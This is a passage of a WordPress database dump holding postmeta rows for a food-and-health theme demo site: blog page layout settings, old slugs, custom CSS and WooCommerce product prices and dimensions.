,2145,'_wp_old_slug','fruit-bowl'),(6689,2145,'_wp_old_slug','fruit-bowl-5__trashed'),(6690,2145,'_wp_old_slug','fruit-bowl-5'),(6691,2145,'qodef_blog_list_featured_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/working-with-dietitian-2.jpg'),(6692,2145,'_thumbnail_id','3935'),(6693,2145,'qodef_page_content_top_padding','40'),(6694,2145,'qodef_page_content_top_padding_mobile','yes'),(6695,2145,'qodef_blog_single_custom_sidebar_area_meta','home-6'),(6698,2296,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6699,2296,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6700,2296,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6701,2296,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6702,2296,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6703,2296,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6704,2296,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6705,2296,'_thumbnail_id','764'),(6706,2296,'slide_template','default'),(6707,2296,'_wpb_vc_js_status','true'),(6708,2296,'qodef_page_content_behind_header_meta','no'),(6709,2296,'qodef_boxed_background_image_attachment_meta','fixed'),(6710,2296,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(6711,2296,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(6712,2296,'qodef_video_type_meta','social_networks'),(6713,2296,'qodef_audio_type_meta','social_networks'),(6714,2296,'qodef_post_skin','qodef-post-light-skin'),(6715,2296,'qodef_disable_vertical_header_background_image_meta','no'),(6716,2296,'qodef_disable_header_widget_logo_area_meta','no'),(6717,2296,'qodef_disable_header_widget_menu_area_meta','no'),(6718,2296,'qodef_title_area_height_meta','140'),(6719,2296,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(6720,2296,'qodef_title_area_title_tag_meta','h2'),(6721,2296,'qodef_title_text_color_meta','#3c3c3c'),(6722,2296,'qodef_title_area_background_image_behavior_meta','parallax'),(6723,2296,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(6724,2296,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you'),(6725,2296,'qodef_page_content_top_padding','40'),(6726,2296,'_dp_original','762'),(6727,2296,'_wp_old_slug','asian-veggie-cuisine'),(6728,2296,'_wp_old_slug','nec-ex-lorem-debet-ei-sea-inani-intellegam-cu-porro-atomorum-sea'),(6729,2296,'qodef_page_content_top_padding_mobile','yes'),(6777,668,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6778,668,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6779,668,'_thumbnail_id','670'),(6780,668,'slide_template','default'),(6781,668,'_wpb_vc_js_status','true'),(6782,668,'qodef_page_content_behind_header_meta','no'),(6783,668,'qodef_boxed_background_image_attachment_meta','fixed'),(6784,668,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(6785,668,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(6786,668,'qodef_video_type_meta','social_networks'),(6787,668,'qodef_audio_type_meta','social_networks'),(6788,668,'qodef_post_skin','qodef-post-light-skin'),(6789,668,'qodef_disable_vertical_header_background_image_meta','no'),(6790,668,'qodef_disable_header_widget_logo_area_meta','no'),(6791,668,'qodef_disable_header_widget_menu_area_meta','no'),(6792,668,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6793,668,'qodef_title_area_height_meta','140'),(6794,668,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(6795,668,'qodef_title_area_title_tag_meta','h2'),(6796,668,'qodef_title_text_color_meta','#3c3c3c'),(6797,668,'qodef_title_area_background_image_behavior_meta','parallax'),(6798,668,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(6799,668,'qodef_page_content_top_padding','40'),(6800,668,'qodef_page_content_top_padding_mobile','yes'),(6801,668,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you'),(6804,722,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6805,722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6806,722,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6807,722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6808,722,'_thumbnail_id','724'),(6809,722,'slide_template','default'),(6810,722,'_wpb_vc_js_status','true'),(6811,722,'qodef_page_content_behind_header_meta','no'),(6812,722,'qodef_boxed_background_image_attachment_meta','fixed'),(6813,722,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(6814,722,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(6815,722,'qodef_video_type_meta','social_networks'),(6816,722,'qodef_audio_type_meta','social_networks'),(6817,722,'qodef_post_skin','qodef-post-light-skin'),(6818,722,'qodef_disable_vertical_header_background_image_meta','no'),(6819,722,'qodef_disable_header_widget_logo_area_meta','no'),(6820,722,'qodef_disable_header_widget_menu_area_meta','no'),(6821,722,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6822,722,'qodef_title_area_height_meta','140'),(6823,722,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(6824,722,'qodef_title_area_title_tag_meta','h2'),(6825,722,'qodef_title_text_color_meta','#3c3c3c'),(6826,722,'qodef_title_area_background_image_behavior_meta','parallax'),(6827,722,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(6828,722,'_dp_original','668'),(6829,722,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you'),(6830,722,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you-2'),(6831,722,'qodef_page_content_top_padding','40'),(6832,722,'qodef_page_content_top_padding_mobile','yes'),(6835,733,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6836,733,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6837,733,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6838,733,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6839,733,'slide_template','default'),(6840,733,'_wpb_vc_js_status','true'),(6841,733,'qodef_page_content_behind_header_meta','no'),(6842,733,'qodef_boxed_background_image_attachment_meta','fixed'),(6843,733,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(6844,733,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(6845,733,'qodef_video_type_meta','social_networks'),(6846,733,'qodef_audio_type_meta','social_networks'),(6847,733,'qodef_post_skin','qodef-post-light-skin'),(6848,733,'qodef_disable_vertical_header_background_image_meta','no'),(6849,733,'qodef_disable_header_widget_logo_area_meta','no'),(6850,733,'qodef_disable_header_widget_menu_area_meta','no'),(6851,733,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6852,733,'qodef_title_area_height_meta','140'),(6853,733,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(6854,733,'qodef_title_area_title_tag_meta','h2'),(6855,733,'qodef_title_text_color_meta','#3c3c3c'),(6856,733,'qodef_title_area_background_image_behavior_meta','parallax'),(6857,733,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(6858,733,'_dp_original','668'),(6859,733,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you'),(6860,733,'qodef_post_quote_text_meta','Lorem ipsum dolor sit amet, no quem homero ius'),(6861,733,'qodef_post_quote_author_meta','Marianne Pascal'),(6862,733,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you-2'),(6863,733,'qodef_page_content_top_padding','40'),(6864,733,'_thumbnail_id','3368'),(6865,733,'qodef_page_content_top_padding_mobile','yes'),(6868,753,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6869,753,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6870,753,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6871,753,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6872,753,'_thumbnail_id','754'),(6873,753,'slide_template','default'),(6874,753,'_wpb_vc_js_status','true'),(6875,753,'qodef_page_content_behind_header_meta','no'),(6876,753,'qodef_boxed_background_image_attachment_meta','fixed'),(6877,753,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(6878,753,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(6879,753,'qodef_video_type_meta','social_networks'),(6880,753,'qodef_audio_type_meta','self'),(6881,753,'qodef_post_skin','qodef-post-light-skin'),(6882,753,'qodef_disable_vertical_header_background_image_meta','no'),(6883,753,'qodef_disable_header_widget_logo_area_meta','no'),(6884,753,'qodef_disable_header_widget_menu_area_meta','no'),(6885,753,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6886,753,'qodef_title_area_height_meta','140'),(6887,753,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(6888,753,'qodef_title_area_title_tag_meta','h2'),(6889,753,'qodef_title_text_color_meta','#3c3c3c'),(6890,753,'qodef_title_area_background_image_behavior_meta','parallax'),(6891,753,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(6892,753,'_dp_original','668'),(6893,753,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you'),(6894,753,'qodef_post_audio_link_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/Fingers-In-The-Noise-Elixir.mp3'),(6895,753,'qodef_post_audio_custom_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/Fingers-In-The-Noise-Elixir.mp3'),(6896,753,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you-2'),(6897,753,'qodef_page_content_top_padding','40'),(6898,753,'qodef_page_content_top_padding_mobile','yes'),(6901,762,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6902,762,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6903,762,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6904,762,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6905,762,'_thumbnail_id','764'),(6906,762,'slide_template','default'),(6907,762,'_wpb_vc_js_status','true'),(6908,762,'qodef_page_content_behind_header_meta','no'),(6909,762,'qodef_boxed_background_image_attachment_meta','fixed'),(6910,762,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(6911,762,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(6912,762,'qodef_video_type_meta','social_networks'),(6913,762,'qodef_audio_type_meta','social_networks'),(6914,762,'qodef_post_skin','qodef-post-light-skin'),(6915,762,'qodef_disable_vertical_header_background_image_meta','no'),(6916,762,'qodef_disable_header_widget_logo_area_meta','no'),(6917,762,'qodef_disable_header_widget_menu_area_meta','no'),(6918,762,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6919,762,'qodef_title_area_height_meta','140'),(6920,762,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(6921,762,'qodef_title_area_title_tag_meta','h2'),(6922,762,'qodef_title_text_color_meta','#3c3c3c'),(6923,762,'qodef_title_area_background_image_behavior_meta','parallax'),(6924,762,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(6925,762,'_dp_original','668'),(6926,762,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you'),(6927,762,'qodef_page_content_top_padding','40'),(6928,762,'qodef_page_content_top_padding_mobile','yes'),(6931,781,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6932,781,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6933,781,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6934,781,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6935,781,'slide_template','default'),(6936,781,'_wpb_vc_js_status','true'),(6937,781,'qodef_page_content_behind_header_meta','no'),(6938,781,'qodef_boxed_background_image_attachment_meta','fixed'),(6939,781,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(6940,781,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(6941,781,'qodef_video_type_meta','social_networks'),(6942,781,'qodef_audio_type_meta','social_networks'),(6943,781,'qodef_post_skin','qodef-post-light-skin'),(6944,781,'qodef_disable_vertical_header_background_image_meta','no'),(6945,781,'qodef_disable_header_widget_logo_area_meta','no'),(6946,781,'qodef_disable_header_widget_menu_area_meta','no'),(6947,781,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6948,781,'qodef_title_area_height_meta','140'),(6949,781,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(6950,781,'qodef_title_area_title_tag_meta','h2'),(6951,781,'qodef_title_text_color_meta','#3c3c3c'),(6952,781,'qodef_title_area_background_image_behavior_meta','parallax'),(6953,781,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(6954,781,'_dp_original','668'),(6955,781,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you'),(6956,781,'qodef_post_link_link_meta','https://themeforest.net/user/select-themes'),(6957,781,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you-2'),(6958,781,'_wp_old_slug','organic-mix-for-good-health'),(6959,781,'_wp_old_slug','organic-mix-for-the-best-morning-start'),(6960,781,'qodef_page_content_top_padding','40'),(6961,781,'_thumbnail_id','3369'),(6962,781,'qodef_page_content_top_padding_mobile','yes'),(6965,825,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6966,825,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6967,825,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6968,825,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6969,825,'slide_template','default'),(6970,825,'_wpb_vc_js_status','true'),(6971,825,'qodef_page_content_behind_header_meta','no'),(6972,825,'qodef_boxed_background_image_attachment_meta','fixed'),(6973,825,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(6974,825,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(6975,825,'qodef_video_type_meta','social_networks'),(6976,825,'qodef_audio_type_meta','social_networks'),(6977,825,'qodef_post_skin','qodef-post-light-skin'),(6978,825,'qodef_disable_vertical_header_background_image_meta','no'),(6979,825,'qodef_disable_header_widget_logo_area_meta','no'),(6980,825,'qodef_disable_header_widget_menu_area_meta','no'),(6981,825,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6982,825,'qodef_title_area_height_meta','140'),(6983,825,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(6984,825,'qodef_title_area_title_tag_meta','h2'),(6985,825,'qodef_title_text_color_meta','#3c3c3c'),(6986,825,'qodef_title_area_background_image_behavior_meta','parallax'),(6987,825,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(6988,825,'_dp_original','668'),(6989,825,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you'),(6990,825,'qodef_post_gallery_images_meta','838,724,839'),(6991,825,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you-2'),(6992,825,'qodef_page_content_top_padding','40'),(6993,825,'qodef_page_content_top_padding_mobile','yes'),(6996,844,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6997,844,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6998,844,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6999,844,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7000,844,'_thumbnail_id','839'),(7001,844,'slide_template','default'),(7002,844,'_wpb_vc_js_status','true'),(7003,844,'qodef_page_content_behind_header_meta','no'),(7004,844,'qodef_boxed_background_image_attachment_meta','fixed'),(7005,844,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(7006,844,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(7007,844,'qodef_video_type_meta','social_networks'),(7008,844,'qodef_audio_type_meta','social_networks'),(7009,844,'qodef_post_skin','qodef-post-light-skin'),(7010,844,'qodef_disable_vertical_header_background_image_meta','no'),(7011,844,'qodef_disable_header_widget_logo_area_meta','no'),(7012,844,'qodef_disable_header_widget_menu_area_meta','no'),(7013,844,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(7014,844,'qodef_title_area_height_meta','140'),(7015,844,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(7016,844,'qodef_title_area_title_tag_meta','h2'),(7017,844,'qodef_title_text_color_meta','#3c3c3c'),(7018,844,'qodef_title_area_background_image_behavior_meta','parallax'),(7019,844,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(7020,844,'_dp_original','668'),(7021,844,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you'),(7022,844,'qodef_post_video_link_meta','https://vimeo.com/28781336'),(7023,844,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you-2'),(7024,844,'qodef_page_content_top_padding','40'),(7025,844,'qodef_page_content_top_padding_mobile','yes'),(7028,875,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(7030,875,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(7032,875,'_thumbnail_id','670'),(7033,875,'slide_template','default'),(7034,875,'_wpb_vc_js_status','true'),(7035,875,'qodef_page_content_behind_header_meta','no'),(7036,875,'qodef_boxed_background_image_attachment_meta','fixed'),(7037,875,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(7038,875,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(7039,875,'qodef_video_type_meta','social_networks'),(7040,875,'qodef_audio_type_meta','social_networks'),(7041,875,'qodef_post_skin','qodef-post-light-skin'),(7042,875,'qodef_disable_vertical_header_background_image_meta','no'),(7043,875,'qodef_disable_header_widget_logo_area_meta','no'),(7044,875,'qodef_disable_header_widget_menu_area_meta','no'),(7045,875,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(7046,875,'qodef_title_area_height_meta','140'),(7047,875,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(7048,875,'qodef_title_area_title_tag_meta','h2'),(7049,875,'qodef_title_text_color_meta','#3c3c3c'),(7050,875,'qodef_title_area_background_image_behavior_meta','parallax'),(7051,875,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(7052,875,'_dp_original','668'),(7053,875,'qodef_page_content_top_padding','40'),(7054,875,'_wp_old_slug','substitute-for-milk-is-inevitable-for-vegans'),(7055,875,'_wp_old_slug','best-milk-substitute-for-vegans'),(7056,875,'qodef_page_content_top_padding_mobile','yes'),(7059,902,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(7061,902,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(7064,902,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(7065,902,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(7066,902,'_thumbnail_id','906'),(7067,902,'slide_template','default'),(7068,902,'_wpb_vc_js_status','true'),(7069,902,'qodef_page_content_behind_header_meta','no'),(7070,902,'qodef_boxed_background_image_attachment_meta','fixed'),(7071,902,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(7072,902,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(7073,902,'qodef_video_type_meta','social_networks'),(7074,902,'qodef_audio_type_meta','social_networks'),(7075,902,'qodef_post_skin','qodef-post-light-skin'),(7076,902,'qodef_disable_vertical_header_background_image_meta','no'),(7077,902,'qodef_disable_header_widget_logo_area_meta','no'),(7078,902,'qodef_disable_header_widget_menu_area_meta','no'),(7079,902,'qodef_title_area_height_meta','140'),(7080,902,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(7081,902,'qodef_title_area_title_tag_meta','h2'),(7082,902,'qodef_title_text_color_meta','#3c3c3c'),(7083,902,'qodef_title_area_background_image_behavior_meta','parallax'),(7084,902,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(7085,902,'_dp_original','875'),(7086,902,'_wp_old_slug','substitute-for-milk-is-inevitable-for-vegans'),(7087,902,'_wp_old_slug','substitute-for-milk-is-inevitable-for-vegans-2'),(7088,902,'qodef_page_content_top_padding','40'),(7089,902,'_wp_old_slug','veggie-recepies-for-fast-breakfast-solutions'),(7090,902,'qodef_page_content_top_padding_mobile','yes'),(7093,910,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(7095,910,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(7099,910,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(7100,910,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(7101,910,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(7102,910,'_thumbnail_id','912'),(7103,910,'slide_template','default'),(7104,910,'_wpb_vc_js_status','true'),(7105,910,'qodef_page_content_behind_header_meta','no'),(7106,910,'qodef_boxed_background_image_attachment_meta','fixed'),(7107,910,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(7108,910,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(7109,910,'qodef_video_type_meta','social_networks'),(7110,910,'qodef_audio_type_meta','social_networks'),(7111,910,'qodef_post_skin','qodef-post-light-skin'),(7112,910,'qodef_disable_vertical_header_background_image_meta','no'),(7113,910,'qodef_disable_header_widget_logo_area_meta','no'),(7114,910,'qodef_disable_header_widget_menu_area_meta','no'),(7115,910,'qodef_title_area_height_meta','140'),(7116,910,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(7117,910,'qodef_title_area_title_tag_meta','h2'),(7118,910,'qodef_title_text_color_meta','#3c3c3c'),(7119,910,'qodef_title_area_background_image_behavior_meta','parallax'),(7120,910,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(7121,910,'_wp_old_slug','substitute-for-milk-is-inevitable-for-vegans'),(7122,910,'_wp_old_slug','substitute-for-milk-is-inevitable-for-vegans-2'),(7123,910,'_dp_original','902'),(7124,910,'_wp_old_slug','veggie-recepies-for-fast-breakfast-solutions'),(7125,910,'_wp_old_slug','organic-vegan-cosmetic-make-up-products'),(7126,910,'_wp_old_slug','perfect-organic-vegan-make-up-products'),(7127,910,'_wp_old_slug','veggie-recepies-for-fast-breakfast-solutions-2'),(7128,910,'qodef_page_content_top_padding','40'),(7129,910,'qodef_page_content_top_padding_mobile','yes'),(7130,1080,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7131,1080,'_wc_review_count','0'),(14210,5435,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(7133,1080,'_wc_average_rating','0'),(7134,1080,'qodef_show_new_sign_woo_meta','no'),(7135,1080,'_sku','01'),(7136,1080,'_regular_price','79'),(7137,1080,'_sale_price',''),(7138,1080,'_sale_price_dates_from',''),(7139,1080,'_sale_price_dates_to',''),(7140,1080,'total_sales','0'),(7141,1080,'_tax_status','taxable'),(7142,1080,'_tax_class',''),(7143,1080,'_manage_stock','no'),(7144,1080,'_backorders','no'),(7145,1080,'_sold_individually','no'),(7146,1080,'_weight','0.3'),(7147,1080,'_length','20'),(7148,1080,'_width','30'),(7149,1080,'_height','70'),(7150,1080,'_upsell_ids','a:0:{}'),(7151,1080,'_crosssell_ids','a:0:{}'),(7152,1080,'_purchase_note',''),(7153,1080,'_default_attributes','a:0:{}'),(7154,1080,'_virtual','no'),(7155,1080,'_downloadable','no'),(7156,1080,'_product_image_gallery','1120,1121,1122'),(7157,1080,'_download_limit','-1'),(7158,1080,'_download_expiry','-1'),(7159,1080,'_stock',''),(7160,1080,'_stock_status','instock'),(7161,1080,'_product_version','4.0.4'),(7162,1080,'_price','79'),(7163,1080,'slide_template',''),(7164,1080,'_wpb_vc_js_status','true'),(7165,1080,'_thumbnail_id','2473'),(7166,1095,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7167,1095,'_sku','02'),(7168,1095,'_regular_price','98'),(7169,1095,'_sale_price',''),(7170,1095,'_sale_price_dates_from',''),(7171,1095,'_sale_price_dates_to',''),(7172,1095,'total_sales','0'),(7173,1095,'_tax_status','taxable'),(7174,1095,'_tax_class',''),(7175,1095,'_manage_stock','no'),(7176,1095,'_backorders','no'),(7177,1095,'_sold_individually','no'),(7178,1095,'_weight','0.3'),(7179,1095,'_length','20'),(7180,1095,'_width','30'),(7181,1095,'_height','70'),(7182,1095,'_upsell_ids','a:0:{}'),(7183,1095,'_crosssell_ids','a:0:{}'),(7184,1095,'_purchase_note',''),(7185,1095,'_default_attributes','a:0:{}'),(7186,1095,'_virtual','no'),(7187,1095,'_downloadable','no'),(7188,1095,'_product_image_gallery','1124,1125,1126'),(7189,1095,'_download_limit','-1'),(7190,1095,'_download_expiry','-1'),(7191,1095,'_stock',''),(7192,1095,'_stock_status','instock'),(7193,1095,'_wc_average_rating','0'),(7195,1095,'_wc_review_count','0'),(7196,1095,'_downloadable_files','a:0:{}'),(7197,1095,'_product_attributes','a:0:{}'),(7198,1095,'_product_version','4.0.4'),(7199,1095,'_price','98'),(7200,1095,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7201,1095,'qodef_show_new_sign_woo_meta','no'),(7202,1095,'slide_template',''),(7203,1095,'_wpb_vc_js_status','true'),(7204,1095,'_thumbnail_id','2474'),(7205,1096,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7206,1096,'_sku','03'),(7207,1096,'_regular_price','106'),(7208,1096,'_sale_price',''),(7209,1096,'_sale_price_dates_from',''),(7210,1096,'_sale_price_dates_to',''),(7211,1096,'total_sales','0'),(7212,1096,'_tax_status','taxable'),(7213,1096,'_tax_class',''),(7214,1096,'_manage_stock','no'),(7215,1096,'_backorders','no'),(7216,1096,'_sold_individually','no'),(7217,1096,'_weight','0.3'),(7218,1096,'_length','20'),(7219,1096,'_width','30'),(7220,1096,'_height','70'),(7221,1096,'_upsell_ids','a:0:{}'),(7222,1096,'_crosssell_ids','a:0:{}'),(7223,1096,'_purchase_note',''),(7224,1096,'_default_attributes','a:0:{}'),(7225,1096,'_virtual','no'),(7226,1096,'_downloadable','no'),(7227,1096,'_product_image_gallery','1132,1133,1134'),(7228,1096,'_download_limit','-1'),(7229,1096,'_download_expiry','-1'),(7230,1096,'_stock',''),(7231,1096,'_stock_status','instock'),(7232,1096,'_wc_average_rating','0'),(14211,5435,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(7234,1096,'_wc_review_count','0'),(7235,1096,'_downloadable_files','a:0:{}'),(7236,1096,'_product_attributes','a:0:{}'),(7237,1096,'_product_version','4.0.4'),(7238,1096,'_price','106'),(7239,1096,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7240,1096,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7241,1096,'qodef_show_new_sign_woo_meta','no'),(7242,1096,'slide_template','default'),(7243,1096,'_wpb_vc_js_status','true'),(7244,1096,'_thumbnail_id','2475'),(7245,1097,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7246,1097,'_sku','04'),(7247,1097,'_regular_price','86'),(7248,1097,'_sale_price',''),(7249,1097,'_sale_price_dates_from',''),(7250,1097,